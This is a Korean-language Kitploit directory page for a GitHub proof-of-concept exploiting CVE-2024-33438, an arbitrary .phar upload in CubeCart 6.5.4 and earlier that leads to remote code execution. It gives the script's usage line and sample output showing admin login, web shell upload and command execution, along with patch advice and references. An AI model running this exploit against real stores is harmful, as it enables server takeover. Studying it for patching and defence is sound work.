Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-33438 — CubeCart <= 6.5.4는 임의 파일 업로드 취약점에 노출되어 원격 코드 실행(RCE)으로 이어집니다. | Kitploit
도구/GitHubGitHub/julio-cfa/cve-2024-33438
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubjulio-cfa/cve-2024-33438

CVE-2024-33438

CubeCart <= 6.5.4는 임의 파일 업로드 취약점에 노출되어 원격 코드 실행(RCE)으로 이어집니다.

저장소 보기
3372년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

임의 파일 업로드로 인한 RCE (CVE-2024-33438)

CubeCart <= 6.5.4는 임의 파일 업로드 문제에 취약하여 원격 코드 실행(RCE)으로 이어집니다. 이 취약점은 애플리케이션의 파일 관리자와 필터에 영향을 미치며, 공격자가 악성 코드가 포함된 .phar 파일을 업로드할 수 있게 합니다. CubeCart는 이 취약점을 수정하는 보안 패치를 구현한 6.5.5로 업데이트해야 합니다.

자세한 내용은 참고 자료에 있는 CubeCart의 공식 발표를 참조하십시오.

익스플로잇

자동화된 개념 증명(PoC)이 작성되었지만, 이 취약점은 파일 관리자를 통해 악성 .phar 파일을 업로드하여 수동으로도 악용할 수 있습니다.

PoC 사용법은 다음과 같습니다:

root@kitploit:~
Usage: python3 CubeCartCVE.py <URL> <username> <password> <command>

실행 후, 성공적인 악용에 대한 예상 출력은 다음과 같습니다:

root@kitploit:~
python3 CubeCartCVE.py http://localhost/admin_0Kqnr9.php admin 123456 whoami

     []  ,----.___
   __||_/___      '.
  / O||    /|
 /   ""   / /
/________/ /   launching exploit
|________|/    please wait...

[+] Trying to log into the application...
[+] Successful login. Uploading a simple web shell to the server...
[+] Executing command...

Output: www-data

참고 자료

  • https://forums.cubecart.com/topic/59046-cubecart-655-released-minor-security-update/
  • https://github.com/cubecart/v6/issues/3570
  • https://github.com/cubecart/v6/commit/31a5ec39b0924b2111fbc3aa419bd8c5c3fc1841
  • https://www.cve.org/CVERecord?id=CVE-2024-33438
  • http://blog.cat22.io/blog/cve/cve-2024-33438.html
도구 다운로드